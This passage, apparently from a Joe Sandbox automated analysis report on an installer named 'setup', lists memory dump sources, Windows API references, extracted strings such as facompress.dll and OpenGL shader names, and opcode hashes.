                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Client$CursorScreen$ClipRect
                                                                                                    • String ID: Win32: Failed to register raw input device
                                                                                                    • API String ID: 15536226-3523228969
                                                                                                    • Opcode ID: 6ffb2b5fb355d33904818ddd97687caa53a96702278fa0a22a3f73d1dccee926
                                                                                                    • Instruction ID: f0583bc63455016355cd6987cd175bac58b9299b346870ab027e828eb679a33c
                                                                                                    • Opcode Fuzzy Hash: 6ffb2b5fb355d33904818ddd97687caa53a96702278fa0a22a3f73d1dccee926
                                                                                                    • Instruction Fuzzy Hash: E631C8B19187018FD704BF78E68925E7BF4AF45302F014939E8858B216E7B4D898CB97
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalDeleteSectionfree
                                                                                                    • String ID: `-($`-(
                                                                                                    • API String ID: 2988086103-776069354
                                                                                                    • Opcode ID: 23af6a787881050e0e137f864d67648be4140ad140926a54655372d4a4b8a565
                                                                                                    • Instruction ID: 967c60d444c982040bee7e50b1778d26a81cfe6e7e4c5b73391bdab71e69f0a0
                                                                                                    • Opcode Fuzzy Hash: 23af6a787881050e0e137f864d67648be4140ad140926a54655372d4a4b8a565
                                                                                                    • Instruction Fuzzy Hash: BD3114B05157018BDB10BF38D8C57A97BE8AF00300F4509B9DC849F24AEB74E859CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$ErrorFullLastMessageNamePathwcsncmp
                                                                                                    • String ID: %ls$%ls\%ls$Error$MakeValidInstallPath: GetFullPathName$MakeValidInstallPath: swprintfInvalid path.$\
                                                                                                    • API String ID: 1504657914-973090064
                                                                                                    • Opcode ID: 5c8c5840db9d3ed09ce7c11a9c12643ae51eaa2c56bfeb361840554d487b96d3
                                                                                                    • Instruction ID: 2dcdf9838934db9835281cc6500c6285101c95613a9d3dd908c2fc1d79531c21
                                                                                                    • Opcode Fuzzy Hash: 5c8c5840db9d3ed09ce7c11a9c12643ae51eaa2c56bfeb361840554d487b96d3
                                                                                                    • Instruction Fuzzy Hash: 4B3124B09083419BD710AF68D58979FBBE0FF90344F40892EE9C887250E7B9C588DB82
                                                                                                    APIs
                                                                                                    • strcpy.MSVCRT ref: 0023F235
                                                                                                      • Part of subcall function 00266290: _vsnprintf.MSVCRT ref: 002662BE
                                                                                                      • Part of subcall function 0024A7A0: TlsGetValue.KERNEL32 ref: 0024A7AD
                                                                                                    • calloc.MSVCRT ref: 0023F333
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value_vsnprintfcallocstrcpy
                                                                                                    • String ID: is $ERRO$able$aila$ble$d fo$este$requ$rmat$unav$vail
                                                                                                    • API String ID: 1747977231-2917496816
                                                                                                    • Opcode ID: 2d943834818f8fa29555155e40a1a71252f74750151f0ba80bf6334ff22d2c1f
                                                                                                    • Instruction ID: c94771cefaf40aeda41b3721a85654a1cea86fca35f51191842ed671919f7573
                                                                                                    • Opcode Fuzzy Hash: 2d943834818f8fa29555155e40a1a71252f74750151f0ba80bf6334ff22d2c1f
                                                                                                    • Instruction Fuzzy Hash: B2A1C1B4819381DBC764CF56D68121ABBF0BB88744F519A1DF9C82B264C3B58A85CF4B
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strdupmalloc$strlen
                                                                                                    • String ID: glCreateProgram$glCreateShader$shader_compile$shader_link
                                                                                                    • API String ID: 59699954-2841867725
                                                                                                    • Opcode ID: bc1fbfa4d7ec4bcb5a0da71060cb7694657b2a336b0f2d5519b197eafa917203
                                                                                                    • Instruction ID: f725352cd351424cb31c46a99245d9761574cebd42c4dcea5e296bee71c30a5e
                                                                                                    • Opcode Fuzzy Hash: bc1fbfa4d7ec4bcb5a0da71060cb7694657b2a336b0f2d5519b197eafa917203
                                                                                                    • Instruction Fuzzy Hash: F5A1E2B5608741CFC300EF69D58466EBBF0BF94794F45892DE8899B220DB74E849CB93
                                                                                                    APIs
                                                                                                      • Part of subcall function 0020BAC0: InitializeCriticalSection.KERNEL32 ref: 0020BACA
                                                                                                      • Part of subcall function 0020B840: CreateEventW.KERNEL32 ref: 0020B869
                                                                                                    • free.MSVCRT ref: 001FB2BC
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001FB2EB
                                                                                                    • free.MSVCRT ref: 001FB2FE
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001FB327
                                                                                                    • free.MSVCRT ref: 001FB33A
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001FB363
                                                                                                    • free.MSVCRT ref: 001FB373
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001FB393
                                                                                                    • free.MSVCRT ref: 001FB3A3
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001FB3BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Deletefree$CreateEventInitialize
                                                                                                    • String ID: $p;
                                                                                                    • API String ID: 2386916121-1580312572
                                                                                                    • Opcode ID: ec4d8079c5848adba148153dbbd72fae747f823ef94205c1dc2a0898c4bd6ccd
                                                                                                    • Instruction ID: 32fcd8ffb35f71a5cb3605d410b9a822a09e08e40ea81529a3b7a9320b08d934
                                                                                                    • Opcode Fuzzy Hash: ec4d8079c5848adba148153dbbd72fae747f823ef94205c1dc2a0898c4bd6ccd
                                                                                                    • Instruction Fuzzy Hash: 047180B45187498BD720EF64C18979EBBE8BF84304F414D2DEAC887282E7759558CF93
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Fatal error: DataTables::shift() was called with reversed arguments order, xrefs: 0020896B
                                                                                                    • Fatal error: DataTables::shift() called when list of tables contains more than one entry, xrefs: 00208A44
                                                                                                    • ERROR: can't alloc %lu memory bytes, xrefs: 00208A6E
                                                                                                    • %s, xrefs: 0020898B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exitlongjmp
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$Fatal error: DataTables::shift() called when list of tables contains more than one entry$Fatal error: DataTables::shift() was called with reversed arguments order
                                                                                                    • API String ID: 2151770896-3033669937
                                                                                                    • Opcode ID: 9973febfad92d202ce895f3cb808de8108488726b5a08e7d52057b401de16941
                                                                                                    • Instruction ID: 0150282973380d1acad705ef1b3eb8c0da658e88e0d5daaaa1122e5775e971ba
                                                                                                    • Opcode Fuzzy Hash: 9973febfad92d202ce895f3cb808de8108488726b5a08e7d52057b401de16941
                                                                                                    • Instruction Fuzzy Hash: C7317CB06283069BD310BF24D58562FBBE0BF85344F55C92EE4C89B342DB74C8A1CB96
                                                                                                    APIs
                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,?,00000000,0023C8FD,0023CD07,?,?,?,?,001C7AEF), ref: 0023C789
                                                                                                    • DeleteCriticalSection.KERNEL32(00359260,00357CE0,?,?,00000000,0023C8FD,0023CD07,?,?,?,?,001C7AEF), ref: 0023C81D
                                                                                                    • DeleteCriticalSection.KERNEL32(0035BC74,?,001C7AEF), ref: 0023C824
                                                                                                    • DeleteCriticalSection.KERNEL32(00357D30,?,001C7AEF), ref: 0023C82B
                                                                                                    • DeleteCriticalSection.KERNEL32(003577E0,?,001C7AEF), ref: 0023C832
                                                                                                    • DeleteCriticalSection.KERNEL32(003578A4,?,001C7AEF), ref: 0023C839
                                                                                                    • TlsGetValue.KERNEL32(?,001C7AEF), ref: 0023C84B
                                                                                                    • TlsFree.KERNEL32(00000000,?,001C7AEF), ref: 0023C85D
                                                                                                    • DeleteCriticalSection.KERNEL32(0035A37C,?,001C7AEF), ref: 0023C87F
                                                                                                      • Part of subcall function 0021105E: free.MSVCRT ref: 00211069
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalDeleteSection$FreeValuefree
                                                                                                    • String ID: }5$|5
                                                                                                    • API String ID: 249185191-3269545665
                                                                                                    • Opcode ID: 6fe856705a75d4e704de384fb3f87e583081ee874f1bc416d82fa080e5c9705c
                                                                                                    • Instruction ID: e9ac5a251c387871e4ab3ce06e6eb31eaca970a26d852b7a0bb6dea42ca960af
                                                                                                    • Opcode Fuzzy Hash: 6fe856705a75d4e704de384fb3f87e583081ee874f1bc416d82fa080e5c9705c
                                                                                                    • Instruction Fuzzy Hash: B5218175E202A59BCA733F61ED41C89B7AAAF587117114020FE8062171CFB35CF59F90
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 001F2252
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,00000000,001F2794,?,?,00000000,?,00000000,001F28AF), ref: 001F229F
                                                                                                    • wcsrchr.MSVCRT ref: 001F22B3
                                                                                                    • wcscpy.MSVCRT ref: 001F22C6
                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,00000000,001F28AF), ref: 001F22D4
                                                                                                    • wcscpy.MSVCRT ref: 001F22E9
                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,001F28AF), ref: 001F22F1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoadwcscpy$AddressFileModuleNameProcwcsrchr
                                                                                                    • String ID: \$facompress.dll$facompress_mt.dll
                                                                                                    • API String ID: 2746798982-1939784871
                                                                                                    • Opcode ID: 30068ba32f9c84be8595f6d818c25fecc3ac9574109a4a1a1b1d818fcb33604b
                                                                                                    • Instruction ID: 02cb66875397f0b38b4f56ed306e062984300cbc755c7ffdd84cf2a989f01484
                                                                                                    • Opcode Fuzzy Hash: 30068ba32f9c84be8595f6d818c25fecc3ac9574109a4a1a1b1d818fcb33604b
                                                                                                    • Instruction Fuzzy Hash: 202138F19097089BD710EF34FAC566ABBF0BB84344F01993DE88987216D374E4589B96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 39653677-0
